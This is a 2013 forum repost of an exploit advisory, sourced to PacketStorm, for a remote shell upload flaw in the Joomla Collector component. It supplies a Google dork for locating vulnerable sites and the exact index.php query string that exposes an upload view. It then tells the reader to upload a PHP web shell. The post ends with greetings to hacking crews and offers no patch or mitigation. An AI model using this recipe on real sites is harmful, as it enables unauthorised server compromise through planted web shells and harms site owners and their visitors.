Praetorian503 Posted January 21, 2013 Report Posted January 21, 2013 The Joomla Collector component suffers from a remote shell upload vulnerability.# Exploit Title:Joomla com_collecter shell upload# Author: Red Dragon_al (Alb0zZ Team)# Home :HackForums.AL,alb0zz.in# Date :19/01/2013# Category:: web apps# Google dork: [inurl:index.php?option=com_collector]# Tested on: Windows XP# Download: http://www.steevo.fr/en/download# Home Page: http://www.steevo.fr/---------------------------------------# ~ Expl0itation ~ #---------------------------------------1- Google dork: [inurl:index.php?option=com_collector]2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=13- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1upload ur shell as : shell.php# Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends.#2013Source: PacketStorm Quote